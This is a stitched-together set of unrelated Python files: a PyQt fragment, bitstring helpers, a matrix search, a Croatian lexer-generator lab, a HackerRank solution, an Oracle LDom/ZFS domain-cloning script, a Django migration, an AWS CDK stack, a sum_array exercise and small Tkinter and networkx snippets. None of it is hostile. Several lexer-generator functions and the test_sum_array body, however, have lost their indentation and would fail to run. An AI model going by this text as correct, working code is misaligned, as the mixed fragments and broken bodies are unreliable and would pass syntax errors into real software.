        painter.drawRect(520, 10, 270, 578)
        # Draws the slider 'base'
        painter.setPen(QtGui.QColor(0, 0, 0))
        painter.drawLine(100, 570, 400, 570)

    def changeValue(self, value):
        # NOTE(review): `self.wid` is never assigned anywhere in this class,
        # so calling this would raise AttributeError — confirm intended target.
        self.wid.emit(QtCore.SIGNAL("updateRobot(int)"), value)
        self.wid.repaint()
# Setup the Window, and the Robot
# Bootstrap: create the Qt application, show the window, run the event loop.
app = QtGui.QApplication(sys.argv)
win = Window()
win.show()
app.exec_()
|
import bitstring
from bitstring import BitArray
# to always make sure the address is in the right format
def complete_address(value):
    """Zero-pad a binary address string to exactly 32 characters.

    Returns the string 'none' for empty input or anything longer than 32
    characters; a 32-character input is returned unchanged.
    """
    length = len(value)
    if length == 0 or length > 32:
        return 'none'
    if length == 32:
        return value
    # rjust pads on the left with '0' (unlike zfill it has no sign handling)
    return str(value).rjust(32, '0')
# to transform the integer to binary string of 32 bits to be written in memory
def value_to_write(value):
    """Encode an int as a 32-bit two's-complement binary string for memory.

    Returns -1 when the sentinel string "none" is passed instead of an int.
    """
    if value == "none":
        return -1
    return BitArray(int=value, length=32).bin
# transform binary string loaded from memory to int
def binary_to_int(value):
    """Decode a binary string loaded from memory as a signed (two's-complement) int."""
    return BitArray(bin=value).int
def binary_or_int_to_hex(value, type):
    """Convert *value* to a hex string.

    type: "bin" -> *value* is a binary string; "int" -> *value* is an int.
    Returns None for any other tag.

    BUG FIX: the original compared `type` against the undefined names BIN and
    INT, so every call raised NameError; string tags are used instead.
    """
    if type == "bin":  # binary_to_hex
        return hex(int(value, 2))
    elif type == "int":  # int_to_hex
        return hex(value)
def hex_to_binary_or_int(value, type):
    """Convert a hex string to an int ("int") or to a binary string ("bin").

    BUG FIXES: the original compared `type` against the undefined names
    BIN/INT (NameError on every call), and the "bin" branch converted the
    hard-coded literal '0xa' instead of *value*.
    """
    if type == "int":
        return int(value, 16)
    elif type == "bin":
        return bin(int(value, 16))
class Solution:
    """Staircase search in a matrix whose rows and columns are sorted ascending."""

    def matSearch(self, matrix, N, M, X):
        """Return 1 if X occurs in *matrix*, else 0.

        Starts at the bottom-left corner and walks right (value too small)
        or up (value too large), giving O(rows + cols) time.  N and M are
        the dimensions supplied by the judge and are not needed here.
        """
        row = len(matrix) - 1
        col = 0
        width = len(matrix[0])
        while row >= 0 and col < width:
            current = matrix[row][col]
            if current == X:
                return 1
            if current < X:
                col += 1
            else:
                row -= 1
        return 0
""" [PPJ Projekt - 1. labos - Generator leksičkog analizatora]
@autori: najseksi PPJ ekipa + Dora Franjić
"""
import sys
class LeksickoPravilo:
    """One lexical rule: a lexer state, a regex, and its action arguments."""

    def __init__(self):
        self.stanje = ""       # lexer state the rule belongs to
        self.regex = ""        # regular expression that triggers the rule
        self.argumenti = []    # action lines executed on a match

    def dodaj_argument(self, argument):
        """Append one action argument to the rule."""
        self.argumenti.append(argument)

    def ispis(self):
        """Serialize as 'state regex arg1 arg2 ... ' (trailing space kept)."""
        parts = [self.stanje, self.regex] + self.argumenti
        return " ".join(parts) + " "
class Automat:
    """Epsilon-NFA built from a regular expression (Thompson-style construction).

    States are plain ints.  Transitions live in `funkcije_prijelaza`, a dict
    mapping (state, symbol) -> list of successor states; the empty string ''
    is the epsilon symbol.
    """

    def __init__(self, broj_stanja):
        self.broj_stanja = broj_stanja        # number of states allocated so far
        self.prihvatljiva_stanja = []         # accepting states
        self.funkcije_prijelaza = dict()      # (state, symbol) -> [successor states]

    def dodaj_epsilon_prijelaz(self, staro_stanje, novo_stanje):
        """Add an epsilon ('') transition from staro_stanje to novo_stanje."""
        self.dodaj_prijelaz(staro_stanje, novo_stanje, '')
        return

    def dodaj_prijelaz(self, staro_stanje, novo_stanje, prijelazni_znak):
        """Add a transition, keeping the successor list free of duplicates."""
        if (staro_stanje, prijelazni_znak) not in self.funkcije_prijelaza:
            self.funkcije_prijelaza[(staro_stanje, prijelazni_znak)] = [novo_stanje]
        elif novo_stanje not in self.funkcije_prijelaza[(staro_stanje, prijelazni_znak)]:
            self.funkcije_prijelaza[(staro_stanje, prijelazni_znak)].append(novo_stanje)
        return

    def novo_stanje(self):
        """Allocate and return a fresh state id."""
        self.broj_stanja += 1
        return self.broj_stanja - 1

    @staticmethod
    def je_operator(izraz, i):
        """True if izraz[i] acts as an operator, i.e. is preceded by an even
        number of backslashes (not escaped)."""
        br = 0
        while i - 1 >= 0 and izraz[i - 1] == "\\":
            br += 1
            i -= 1
        return br % 2 == 0
    """
    def nadji_odgovarajucu_zatvorenu_zagradu2(self, izraz):
        for i in range(len(izraz)):
            if izraz[i] == ")" and self.je_operator(izraz, i):
                return i
    """

    def nadji_odgovarajucu_zatvorenu_zagradu(self, izraz):
        """Return the index of the ')' matching the first unescaped '(' in izraz."""
        brojac_otvorenih_zagrada = 0
        for i in range(len(izraz)):
            if izraz[i] == ")" and self.je_operator(izraz, i):
                if brojac_otvorenih_zagrada == 1:
                    return i
                else:
                    brojac_otvorenih_zagrada -= 1
            elif izraz[i] == "(" and self.je_operator(izraz, i):
                brojac_otvorenih_zagrada += 1

    def pretvori(self, izraz):
        """Recursively convert regex *izraz* into NFA fragments.

        Returns (left_state, right_state): the entry and exit states of the
        constructed fragment.  Handles top-level alternation '|', grouping
        '(...)', Kleene star '*', the escapes \\t, \\n, \\_ (tab, newline,
        space) and the empty string as epsilon.
        """
        # split the expression on top-level, unescaped '|' into alternatives
        izbori = []
        br_zagrada = 0
        zadnji = 0
        for i in range(len(izraz)):
            if izraz[i] == "(" and self.je_operator(izraz, i):
                br_zagrada += 1
            elif izraz[i] == ")" and self.je_operator(izraz, i):
                br_zagrada -= 1
            elif br_zagrada == 0 and izraz[i] == "|" and self.je_operator(izraz, i):
                izbori += [izraz[zadnji: i]]
                zadnji = i + 1
        if izbori:
            izbori += [izraz[zadnji: len(izraz)]]
        lijevo_stanje = self.novo_stanje()
        desno_stanje = self.novo_stanje()
        if izbori:
            # alternation: wire each alternative between the fragment ends
            for i in range(len(izbori)):
                privremeno = self.pretvori(izbori[i])
                self.dodaj_epsilon_prijelaz(lijevo_stanje, privremeno[0])
                self.dodaj_epsilon_prijelaz(privremeno[1], desno_stanje)
        else:
            # concatenation: walk the expression symbol by symbol
            prefiksirano = False
            zadnje_stanje = lijevo_stanje
            i = 0
            while i < len(izraz):
                if prefiksirano:
                    # previous char was a backslash: translate the escape
                    prefiksirano = False
                    if izraz[i] == "t":
                        prijelazni_znak = "\t"
                    elif izraz[i] == "n":
                        prijelazni_znak = "\n"
                    elif izraz[i] == "_":
                        prijelazni_znak = " "
                    else:
                        prijelazni_znak = izraz[i]
                    a = self.novo_stanje()
                    b = self.novo_stanje()
                    self.dodaj_prijelaz(a, b, prijelazni_znak)
                else:
                    if izraz[i] == "\\":
                        prefiksirano = True
                        i += 1
                        continue
                    if izraz[i] != "(":
                        # plain symbol (or epsilon) becomes a two-state fragment
                        a = self.novo_stanje()
                        b = self.novo_stanje()
                        if izraz[i] == "":
                            self.dodaj_epsilon_prijelaz(a, b)
                        else:
                            self.dodaj_prijelaz(a, b, izraz[i])
                    else:
                        # grouped subexpression: recurse on its contents
                        j = self.nadji_odgovarajucu_zatvorenu_zagradu(izraz[i:]) + i
                        privremeno = self.pretvori(izraz[i + 1: j])
                        a = privremeno[0]
                        b = privremeno[1]
                        i = j
                if (i + 1) < len(izraz) and izraz[i + 1] == "*":
                    # Kleene star: wrap the fragment with skip/repeat epsilons
                    x = a
                    y = b
                    a = self.novo_stanje()
                    b = self.novo_stanje()
                    self.dodaj_epsilon_prijelaz(a, x)
                    self.dodaj_epsilon_prijelaz(y, b)
                    self.dodaj_epsilon_prijelaz(a, b)
                    self.dodaj_epsilon_prijelaz(y, x)
                    i += 1
                # chain the new fragment onto the concatenation so far
                self.dodaj_epsilon_prijelaz(zadnje_stanje, a)
                zadnje_stanje = b
                i += 1
            self.dodaj_epsilon_prijelaz(zadnje_stanje, desno_stanje)
        return lijevo_stanje, desno_stanje

    def ispis(self):
        """Dump the transition table, one '(state) (symbol) [successors]' per line."""
        string = ""
        for prijelaz in self.funkcije_prijelaza:
            string += str(prijelaz[0]) + " " + str(prijelaz[1]) + " " + str(
                self.funkcije_prijelaza.get(prijelaz)) + "\n"
        return string
##################################################
""" [Globalne varijable] """
regularne_definicije = dict()
lista_stanja = list()
lista_uniformnih_znakova = list()
lista_leksickih_pravila = list()
glavni_automat = Automat(0)
lista_malih_automata = list()
""" [Metode za parsiranje ulaznih podataka]
- ucitaj_regularne_definicije(): parsira prvi dio ulazne datoteke
- ucitaj_stanja(): parsira drugi dio ulazne datoteke
- ucitaj_uniformne_znakove(): parsira treći dio ulazne datoteke
- ucitaj_leksicka_pravila(): parsira četvrti dio ulazne datoteke
"""
def ucitaj_podatke():
global lista_leksickih_pravila
ucitaj_regularne_definicije()
""" [Metoda koja učitava regularne definicije te pokreće učitavanje stanja] """
def ucitaj_regularne_definicije():
global regularne_definicije
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[:2] == "%X":
ucitaj_stanja(linija_unosa)
return
regularna_definicija = linija_unosa.split(" ")
ime_regularne_definicije = regularna_definicija[0]
regularni_izraz = regularna_definicija[1]
regularne_definicije[ime_regularne_definicije] = regularni_izraz
ucitaj_regularne_definicije()
""" [Metoda koja učitava stanja te pokreće učitavanje uniformnih znakova] """
def ucitaj_stanja(linija_unosa):
global lista_stanja
lista_stanja = linija_unosa[3:].split(" ")
ucitaj_uniformne_znakove()
""" [Metoda koja učitava uniformne znakove te pokreće učitavanje leksičkih pravila] """
def ucitaj_uniformne_znakove():
global lista_uniformnih_znakova
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[:2] == "%L":
lista_uniformnih_znakova = linija_unosa[3:].split(" ")
ucitaj_leksicka_pravila()
""" [Metoda koja učitava leksička pravila] """
def ucitaj_leksicka_pravila():
""" [Format leksickih pravila]
<stanje>regex
{
...argumenti svaki u svom retku...
}
"""
global lista_leksickih_pravila
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa == "":
return
leksicko_pravilo = LeksickoPravilo()
if linija_unosa[0] == "<":
indeks = linija_unosa.index(">")
leksicko_pravilo.stanje = linija_unosa[1: indeks]
leksicko_pravilo.regex = linija_unosa[indeks + 1:]
if leksicko_pravilo not in lista_leksickih_pravila:
lista_leksickih_pravila.append(leksicko_pravilo)
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[0] == "{":
while linija_unosa[0] != "}":
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[0] != "{" and linija_unosa[0] != "}":
leksicko_pravilo.dodaj_argument(linija_unosa)
ucitaj_leksicka_pravila()
""" [Metoda koja unutar regex-a svih regularnih definicija, regularnu definiciju zamjenjuje
sa pripadnim regex-om] """
def reformatiraj_regularne_definicije():
    """Expand references between regular definitions: every occurrence of a
    definition name inside another definition's regex is replaced by that
    definition's regex wrapped in parentheses; remaining '$' markers are
    stripped from the expanded regex.
    """
    if not regularne_definicije:
        return
    for key in regularne_definicije:
        for regDef in regularne_definicije:
            if regDef in regularne_definicije.get(key):
                #print(key, regDef, regularne_definicije[key], regularne_definicije[regDef])
                regularne_definicije[key] = regularne_definicije[key].replace(regDef,
                    "(" + regularne_definicije[regDef] + ")")
        regularne_definicije[key] = regularne_definicije[key].replace('$', '')
    return
def pretvori_epsilone(regex):
    """Return *regex* with every '$' (epsilon) that sits in an operator
    position removed, as judged by Automat.je_operator against the
    ORIGINAL string.

    Fix: the original deleted characters from the shrinking result using
    indices computed against the unmodified input, so after the first
    deletion every later '$' was removed at the wrong position. Filtering
    by original index keeps the offsets aligned.
    """
    return "".join(znak for indeks, znak in enumerate(regex)
                   if not (znak == '$' and Automat.je_operator(regex, indeks)))
""" [Metoda koja unutar regex-a zamjenjuje regularne definicije sa pripradnim regex-om] """
def reformatiraj_pravila():
    """Rewrite each lexical rule's regex: drop operator-position epsilons
    and inline every referenced regular definition as a parenthesised
    sub-regex.
    """
    for leksicko_pravilo in lista_leksickih_pravila:
        #leksicko_pravilo.regex = leksicko_pravilo.regex.replace('$', '')
        leksicko_pravilo.regex = pretvori_epsilone(leksicko_pravilo.regex)
        if regularne_definicije:
            for key in regularne_definicije:
                #print("key:", key)
                if key in leksicko_pravilo.regex:
                    #print("leks pravilo regex:", leksicko_pravilo.regex)
                    #leksicko_pravilo.regex = regularne_definicije[key]
                    #print("leks pravilo regex novi:", leksicko_pravilo.regex)
                    leksicko_pravilo.regex = leksicko_pravilo.regex.replace(key, "(" + regularne_definicije[key] + ")")
    return
#todo
def izgradi_automat():
    """Build the master NFA: convert each lexical rule's regex into a small
    automaton and merge them all under the shared start state -1 via
    epsilon transitions.
    """
    global glavni_automat
    trenutni_broj_stanja_automata = 0
    for leksicko_pravilo in lista_leksickih_pravila:
        # Each sub-automaton continues state numbering where the previous
        # one stopped, so the merged transition table has unique states.
        automat = Automat(trenutni_broj_stanja_automata)
        [pocetno_stanje, konacno_stanje] = automat.pretvori(leksicko_pravilo.regex)
        lista_malih_automata.append(automat)
        glavni_automat.funkcije_prijelaza.update(automat.funkcije_prijelaza)
        glavni_automat.prihvatljiva_stanja.append(konacno_stanje)
        # '' is the epsilon symbol: link the shared start to this rule.
        glavni_automat.dodaj_prijelaz(-1, pocetno_stanje, '')
        trenutni_broj_stanja_automata = automat.broj_stanja
    glavni_automat.broj_stanja = trenutni_broj_stanja_automata
    return
def generirajLA():
    """Generate the analyzer script LA.py: copy the LA template, then
    append the computed transition table, lexical-rule data, state list and
    the main-method calls.

    Fix: files are opened with context managers so the handles are closed
    even when a write fails (the original leaked them on error).
    """
    # NOTE(review): template/output paths are Windows-style and relative to
    # the CWD; kept verbatim.
    with open("PPJLabosi\ppj-labos\lab1\\analizator\LA", "rt") as datotekaLA_predlozak:
        predlozak = datotekaLA_predlozak.read()
    with open("PPJLabosi\ppj-labos\lab1\\analizator\LA.py", "wt") as datotekaLA:
        datotekaLA.write(predlozak)
        datotekaLA.write("\ntablica_prijelaza = " + str(glavni_automat.funkcije_prijelaza) + "\n")
        datotekaLA.write(ispis_koda_leksickih_pravila())
        datotekaLA.write("lista_stanja = " + str(lista_stanja) + "\n")
        # The first declared state is the analyzer's initial state.
        datotekaLA.write("trenutno_stanje = " + '\'' + str(lista_stanja[0]) + '\'' + "\n")
        datotekaLA.write("prihvatljiva_stanja = " + str(glavni_automat.prihvatljiva_stanja) + "\n")
        datotekaLA.write("\n")
        datotekaLA.write("\"\"\" [Main metoda] \"\"\"\n")
        datotekaLA.write("\n")
        datotekaLA.write("ucitaj_kod()\n")
        datotekaLA.write("simuliraj()\n")
    return
""" [Metoda koja generira varijablu argumenata leksičkih pravila da se pošalje datoteci LA] """
def ispis_koda_leksickih_pravila():
    """Render the lexical rules as a single Python assignment line of
    (state, arguments) pairs, terminated by a newline, for the generated
    LA.py file.
    """
    parovi = [(pravilo.stanje, pravilo.argumenti)
              for pravilo in lista_leksickih_pravila]
    return "leksicka_pravila = " + str(parovi) + "\n"
def ispis_tablica_prijelaza_malih_automata():
    """Render the transition tables of all sub-automata as one Python list
    assignment line.

    Fix: the original appended a comma after every element and sliced the
    last character off; with an empty automata list that sliced off the
    opening '[' instead. str.join produces the same output without the
    trailing-comma hack and is safe for the empty case.
    """
    sadrzaj = ",".join(str(mali_automat.funkcije_prijelaza)
                       for mali_automat in lista_malih_automata)
    return "tablice_prijelaza_malih_automata = [" + sadrzaj + "]"
""" [Main metoda programa] """
# Pipeline: read the input specification, expand regular definitions,
# rewrite the rule regexes, build the merged NFA, and emit LA.py.
ucitaj_podatke()
reformatiraj_regularne_definicije()
reformatiraj_pravila()
izgradi_automat()
generirajLA()
#!/bin/python3
import os
import sys
from functools import lru_cache
# Complete the stepPerms function below.
# A(n) = A(n - 1) + A(n - 2) + A(n - 3)
# A(1)=1; A(2)=2; A(3)=4.
MODULE = 10000000007

@lru_cache(maxsize=256)
def stepPerms(n):
    """Count the ways to climb a staircase of *n* steps taking 1, 2 or 3
    steps at a time, modulo MODULE.

    Recurrence: A(n) = A(n-1) + A(n-2) + A(n-3), A(1)=1, A(2)=2, A(3)=4.

    Fix: the original recursed once per step and hit Python's recursion
    limit for large n; this iterative rolling window is O(n) time, O(1)
    space, and keeps the lru_cache so repeated queries stay cheap.
    """
    a, b, c = 1, 2, 4  # A(1), A(2), A(3)
    if n == 1:
        return a
    if n == 2:
        return b
    for _ in range(n - 3):
        a, b, c = b, c, (a + b + c) % MODULE
    return c
if __name__ == '__main__':
    # HackerRank harness: answer one query per input line, writing each
    # result to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    s = int(input())  # number of queries
    for s_itr in range(s):
        n = int(input())  # staircase height for this query
        res = stepPerms(n)
        fptr.write(str(res) + '\n')
    fptr.close()
|
#!/usr/bin/python2.7
#
# Copyright (c) 2015, Oracle and/or its affiliates. All rights reserved.
#
import os
import time
import threading
import commands
import Ldom
import re
def execute(cmd):
    """Run *cmd* through the shell and return its output.

    Raises Exception carrying the command and its output when the exit
    status is non-zero.
    """
    status, output = commands.getstatusoutput(cmd)
    if status == 0:
        return output
    raise Exception("Execution of [%s] failed:\n%s" % (cmd, output))
def get_volume_of_domain(ldm):
    '''
    Purpose:
        Get the volume of a domain
    Arguments:
        ldm - Domain name
    Return:
        source_volume - List of zfs volumes backing the domain's vdisks
    '''
    def _volume_of_binding(disk_binding):
        # Map one "VDISK|..." binding line to its backing zfs volume name.
        disk_volume = disk_binding.split("|")[2].split("@")[0]
        cmd_get_disk_service = "ldm list-services -p|grep {0}".format(
            disk_volume)
        all_vd_services = execute(cmd_get_disk_service)
        pattern = re.compile(r'{0}.*'.format(disk_volume))
        match_vdsdev_info = None
        for vdsdev_info in pattern.findall(all_vd_services):
            vol = vdsdev_info.split("|")[0]
            # Exact-name match only: the grep above also returns
            # substring hits.
            if re.match(r'^{0}$'.format(disk_volume), vol) is not None:
                match_vdsdev_info = vdsdev_info
                break
        # Fix: the original left match_vdsdev_info unbound (or stale from
        # a previous iteration) when nothing matched; fail loudly instead.
        if match_vdsdev_info is None:
            raise Exception("No vdsdev found for volume %s" % disk_volume)
        dev_path = match_vdsdev_info.split("|")[2]
        # Fix: the original used lstrip("dev=/dev/zvol/dsk/") which strips
        # any run of those *characters* and could eat the start of the
        # volume name; remove the literal prefix instead.
        prefix = "dev=/dev/zvol/dsk/"
        if dev_path.startswith(prefix):
            dev_path = dev_path[len(prefix):]
        return dev_path

    source_volume = []
    cmd_get_disk_num = "ldm list-bindings -p %s|grep VDISK|wc -l" % ldm
    disk_num = int(execute(cmd_get_disk_num).strip())
    # Both branches resolve bindings the same way; the multi-disk case just
    # walks every VDISK line (the original duplicated this logic inline).
    if disk_num > 1:
        bindings = execute('ldm list-bindings -p %s' % ldm)
        for disk_binding in re.compile('VDISK.*').findall(bindings):
            source_volume.append(_volume_of_binding(disk_binding))
    else:
        disk_binding = execute("ldm list-bindings -p %s|grep VDISK" % ldm).strip()
        source_volume.append(_volume_of_binding(disk_binding))
    return source_volume
def clone_from_source_domain(source_volume_snapshot, *target_list):
    '''
    Purpose:
        Create a domain by clone the volume
    Arguments:
        source_volume_snapshot - Snapshot of the volume
        target_list - Domains to create
    Return:
        None
    '''
    for target in target_list:
        # Clone the snapshot into a per-domain zfs volume under rpool.
        target_domain_volume = 'rpool/{0}'.format(target)
        cmd_clone_from_source_volume = 'zfs clone {0} {1}'.format(
            source_volume_snapshot,
            target_domain_volume)
        execute(cmd_clone_from_source_volume)
        cmd_add_domain = 'ldm add-domain %s' % target
        cmd_add_vcpu = 'ldm add-vcpu 8 %s' % target
        cmd_add_memory = 'ldm add-memory 16G %s' % target
        # Attach the new vnet to the first virtual switch on the system.
        cmd_get_vsw = "ldm list-services -p|grep VSW|awk -F'|' '{print $2}'"
        vsw = execute(cmd_get_vsw).split("=")[1]
        cmd_add_vnet = 'ldm add-vnet vnet_{0} {1} {2}'.format(
            target,
            vsw,
            target)
        # Export the cloned volume through the first virtual disk service.
        cmd_get_vds = "ldm list-services -p|grep VDS|awk -F'|' '{print $2}'"
        vds = execute(cmd_get_vds).split("=")[1]
        cmd_add_vdsdev = 'ldm add-vdsdev /dev/zvol/dsk/{0} {1}@{2}'.format(
            target_domain_volume,
            target,
            vds)
        cmd_add_vdisk = 'ldm add-vdisk vdisk_{0} {1}@{2} {3}'.format(
            target,
            target,
            vds,
            target)
        cmd_set_auto_boot = 'ldm set-var auto-boot?=true {0}'.format(target)
        cmd_set_boot_device = 'ldm set-var boot-device=vdisk_{0} {1}'.format(
            target,
            target)
        cmd_bind_domain = 'ldm bind {0}'.format(target)
        # Run the configuration commands in order; execute() raises on the
        # first failure, aborting this domain's setup.
        cmd_create_domain_list = [
            cmd_add_domain,
            cmd_add_vcpu,
            cmd_add_memory,
            cmd_add_vnet,
            cmd_add_vdsdev,
            cmd_add_vdisk,
            cmd_set_auto_boot,
            cmd_set_boot_device,
            cmd_bind_domain]
        for cmd in cmd_create_domain_list:
            execute(cmd)
            time.sleep(1)
def get_pf_bus(pf):
    '''
    Purpose:
        Get the bus where pf affiliated
    Arguments:
        pf - port of the device
    Return:
        bus - PCIE bus the physical function belongs to
    '''
    # Drop the function suffix to obtain the PCIE device name.
    pci_dev = pf[:-10]
    cmd_get_bus = "ldm list-io -l -p %s|grep 'type=PCIE'" % pci_dev
    try:
        output_get_bus = execute(cmd_get_bus)
    except Exception as e:
        raise Exception("No mapping PCIE device of %s in the system" % pf)
    # Field 6 of the parseable output holds "bus=<name>".
    fields = output_get_bus.split('|')
    return fields[6].split('=')[1]
def main():
    """Provision two root domains and one IO domain by cloning the source
    domain's volume, allocate a PCIE bus to each root domain, boot all
    three and prepare them for testing. Returns 1 on any fatal error."""
    # Target domain names and device assignments come from the environment.
    root_domain_1_name = os.getenv("NPRD_A")
    root_domain_2_name = os.getenv("NPRD_B")
    io_domain_name = os.getenv("IOD")
    password = os.getenv("SOURCE_DOMAIN_PASSWORD")
    pf_1 = os.getenv("PF_A")
    pf_2 = os.getenv("PF_B")
    domains_list = [root_domain_1_name, root_domain_2_name, io_domain_name]
    # Abort if any target domain already exists.
    for domain in domains_list:
        cmd_ldm_list = "ldm list %s" % domain
        (status, output) = commands.getstatusoutput(cmd_ldm_list)
        if status == 0:
            print "%s already exists, abort to create root domains " \
                "and io domain" % domain
            return 1
    # The source domain must exist before we can clone from it.
    source_domain_name = os.getenv("SOURCE_DOMAIN")
    cmd = 'ldm list %s' % source_domain_name
    try:
        execute(cmd)
    except Exception as e:
        print(e)
        return 1
    print("Begin clone domains from source domain %s" % source_domain_name)
    source_volume_list = get_volume_of_domain(source_domain_name)
    if len(source_volume_list) > 1:
        # User choose which volume to snapshot
        # NOTE(review): pressing Enter sets the index to 0 but never
        # breaks out of the loop, so empty input re-prompts forever —
        # confirm whether a bare Enter should accept the default.
        while True:
            user_choose_num = 0
            for source_volume in source_volume_list:
                print "[{0}]{1}".format(user_choose_num, source_volume)
                user_choose_num += 1
            snapshot_volume_input_flag = raw_input(
                "Which volume do you want to snapshot?")
            if snapshot_volume_input_flag == "":
                snapshot_volume_input_num = 0
            else:
                try:
                    snapshot_volume_input_num = int(snapshot_volume_input_flag)
                except Exception:
                    print "Please input a num above"
                else:
                    if not 0 <= snapshot_volume_input_num <= len(
                            source_volume_list):
                        print "Please input a num above"
                    else:
                        break
        source_volume = source_volume_list[snapshot_volume_input_num]
    else:
        source_volume = source_volume_list[0]
    # Snapshot this volume to create new volume used by new domains
    now = time.strftime("%m%d%H%M")
    source_volume_snapshot = "{0}".format(source_volume) + "@ior-" + now
    cmd_snapshot = "zfs snapshot {0}".format(source_volume_snapshot)
    print "Creating snapshot of {0} as {1}".format(source_volume,
                                                   source_volume_snapshot)
    execute(cmd_snapshot)
    # Verify the snapshot actually exists before cloning from it.
    cmd_check_snapshot_success = 'zfs list -t snapshot|grep %s' % \
        source_volume_snapshot
    try:
        execute(cmd_check_snapshot_success)
    except Exception:
        print(
            "snapshot %s not as expected,cancel configuration" %
            source_volume)
    else:
        print "Done,remember to destroy the snapshot %s after all the test" % \
            source_volume_snapshot
    try:
        print "Creating domain %s..." % domains_list
        clone_from_source_domain(source_volume_snapshot, *domains_list)
    except Exception as e:
        print(e)
    else:
        print("Create %s success" % domains_list)
    time.sleep(5)
    # Give each root domain its PCIE bus (SR-IOV enabled).
    domain_pf_dict = {root_domain_1_name: pf_1, root_domain_2_name: pf_2}
    for root_domain, pf in domain_pf_dict.items():
        try:
            bus = get_pf_bus(pf)
            cmd_add_bus = "ldm add-io iov=on %s %s" % (bus, root_domain)
            print "Allocating bus %s to domain %s" % (bus, root_domain)
            execute(cmd_add_bus)
        except Exception as e:
            print "Failed to allocate bus to %s due to:\n%s" % (root_domain, e)
            print "Test user should allocate pci bus to domain manually"
            return 1
        else:
            print "Done"
    print "Waiting created domains boot up..."
    for domain in domains_list:
        cmd_start = "ldm start %s" % domain
        execute(cmd_start)
    # Empirical boot wait before probing the consoles.
    time.sleep(150)
    for domain in domains_list:
        cmd_list_domain = 'ldm list %s | grep %s' % (domain, domain)
        output_list_domain = execute(cmd_list_domain)
        domain_status = output_list_domain.split()[1].strip()
        if domain_status != 'active':
            print "%s is not up and could not login" % domain
            break
        # Log in over the console port and sanity-check the hostname.
        cmd_check_hostname = 'hostname %s' % domain
        domain_port = output_list_domain.split()[3].strip()
        ldom = Ldom.Ldom(domain, password, domain_port, record=False)
        try:
            ldom.sendcmd(cmd_check_hostname, timeout=600)
        except Exception as e:
            print "%s is not up and not able to login due to:\n%s" % (domain, e)
        else:
            # Clear the cloned network identity so the test can configure it.
            cmd_delete_ip = "ipadm delete-ip net0"
            ldom.sendcmd(cmd_delete_ip, check=False)
            cmd_disable_ldap = "svcadm disable svc:/network/ldap/client:default"
            ldom.sendcmd(cmd_disable_ldap, check=False)
            print "%s is up and able to test now" % domain
# Script entry point.
if __name__ == "__main__":
    main()
|
# Generated by Django 2.1.5 on 2019-01-12 22:03
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add hackathon.max_size (default 4)."""
    dependencies = [
        ('hackathon', '0002_hackathon_added_by'),
    ]
    operations = [
        migrations.AddField(
            model_name='hackathon',
            name='max_size',
            field=models.PositiveIntegerField(default=4),
        ),
    ]
|
# Third party
from utils import generate_resource_name
from aws_cdk import core, aws_ssm
from aws_cdk.core import Fn, Tag, CfnParameter
class InfraSampleStack3(core.Stack):
    """CDK stack that publishes an SSM string parameter whose value mixes a
    CloudFormation import (a bucket name) with a template parameter (the
    DWH host)."""
    def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
        super().__init__(scope, id, **kwargs)
        # Naming context fed into generate_resource_name below.
        env = "dev"
        project = "testproject1"
        service = "etl"
        component = "workflow"
        Tag.add(self, "Service", service)
        Tag.add(self, "Component", component)
        # CloudFormation parameter resolved at deploy time.
        param_dwh = CfnParameter(
            self,
            "ParamDWH",
            type="String",
            description="The domain of the DWH to connect to. | team=data,service=dwh",
            default="fakedwh.host",
        )
        # Fn.sub substitutes both placeholders at deploy time: one from a
        # cross-stack export, one from the parameter above.
        value_raw = "import: ${value_to_import}, param: ${param_dwh}"
        value = Fn.sub(
            value_raw,
            {
                "value_to_import": Fn.import_value(
                    generate_resource_name(project, env, service, "buckets", "bucketb")
                ),
                "param_dwh": Fn.ref(param_dwh.logical_id),
            },
        )
        aws_ssm.StringParameter(
            self,
            "SSMParam",
            parameter_name=generate_resource_name(
                project, env, service, component, "ssmparam"
            ),
            string_value=value,
        )
|
'''
Exercise: Write a function, sum_array, that takes an array as an argument and returns the sum of all integers in the array
Considerations: Can you write the function such that it terminates gracefully given an unexpected input, such as an input that
is not an array or an array that contains elements that are not integers?
Expectations: Test case should pass and print "Test case passed!"
'''
# Program -> your code goes below
def sum_array(arr):
    """Return the sum of all integers in *arr*.

    Graceful handling of unexpected input (as the exercise asks):
    - returns None when *arr* is not a list or tuple;
    - skips elements that are not integers (bools are deliberately
      excluded even though bool subclasses int).
    """
    if not isinstance(arr, (list, tuple)):
        return None
    total = 0
    for num in arr:
        if isinstance(num, int) and not isinstance(num, bool):
            total += num
    return total
# Sample inputs for manual experimentation. (The original assigned `arr`
# twice on consecutive identical lines; the duplicate is removed.)
arr = [1, 2, 3, 4, 5, 6]
other_arr = [10, 20, 30]
# Tests
def test_sum_array(sum_array_function):
arr = [1,2,3,4,5]
solution = 15
sum_array_function(arr)
assert (sum_array_function(arr) == solution), f'Expected sum_array to return {solution} but instead returned {sum_array_function(arr)}'
# Fix: the original printed success without ever running the test; run it
# first so the message is earned (test_sum_array raises on failure).
test_sum_array(sum_array)
print("Test cases passed!")
|
from Tkinter import *
class CatchGame:
    """Tiny Tk canvas demo: a blue ball that can jump to a fixed spot."""

    def __init__(self, parent):
        # 200x200 playing field placed in the parent's first grid cell.
        self.canvas = Canvas(parent, width=200, height=200)
        self.canvas.grid(column=0, row=0)
        # Blue ball drawn as an oval around the canvas centre (100, 100).
        self.ball = self.canvas.create_oval(90, 90, 110, 110, fill="blue")

    def move(self):
        """Reposition the ball to the lower-right area of the canvas."""
        self.canvas.coords(self.ball, 150, 150, 170, 170)
# Build the window, attach the game and enter the Tk event loop.
root = Tk()
app = CatchGame(root)
root.mainloop()
|
import networkx as nx
import matplotlib.pyplot as plt
import sys
# CLI arguments: n nodes, each joined to its k nearest neighbours, rewiring
# probability p, RNG seed. Example invocation: 50 4 0.5 1
n=int(sys.argv[1]) #50
k=int(sys.argv[2]) #4
p=float(sys.argv[3]) #0.5
seed=int(sys.argv[4]) #1
#G=nx.newman_watts_strogatz_graph(n,k,p,seed)
G=nx.watts_strogatz_graph(n,k,p,seed)
#G = nx.petersen_graph()
